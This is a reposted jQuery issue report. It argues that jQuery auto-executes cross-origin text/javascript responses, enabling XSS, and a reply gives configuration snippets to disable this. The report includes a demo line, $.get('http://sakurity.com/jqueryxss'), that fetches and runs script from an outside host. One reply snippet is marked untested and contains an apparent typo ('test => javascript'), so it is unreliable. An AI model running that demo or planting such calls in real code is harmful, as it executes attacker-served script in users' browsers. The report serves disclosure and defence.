Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses

Because of this

jQuery.globalEval( text );

every text/javascript response gets executed. Even if we made a request to another service. CORS was created exactly to prevent this kind of behavior in JSONP (arbitrary code execution).

So when we do $.get(‘http://weather.com/sf-weather‘) or like in Rails’ jquery_ujs a form is being sent automatically, the attacker can respond us with text/javascript and execute arbitrary code on our origin. Demo $.get('http://sakurity.com/jqueryxss')

The fix is to not execute responses from 3rd party origins by default and make it an option. Don’t know who to cc to discuss it.

P.S. I would switch it off for same origin either, because using subtle redirect_to saving tricks we can redirect user to local JSONP endpoint and still get an XSS but those are much more sophisticated vectors.

Author: Fantashit

2 thoughts on “Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses

  1. Everything about automated script detection is configurable so it’s pretty easy to disable it (untested examples that should work):

    // Good: disable javascript detection globally
    $.ajaxSetup( {
        contents: {
            javascript: false
        }
    } );
    
    // Acceptable: disable text to javascript promotion (but will break intended manual conversions)
    $.ajaxSetup( {
        converters: {
            "test => javascript": false
        }
    } );
    
    // Preferred: use a prefilter to be more specific (only crossDomain)
    $.ajaxPrefilter( function( s ) {
        if ( s.crossDomain ) {
            s.contents.javascript = false;
        }
    } );

    Not a fan of changing the behaviour within the lib but I can understand the rationale (though I’d recommand just removing the javascript dataType detection in the default options then).

Comments are closed.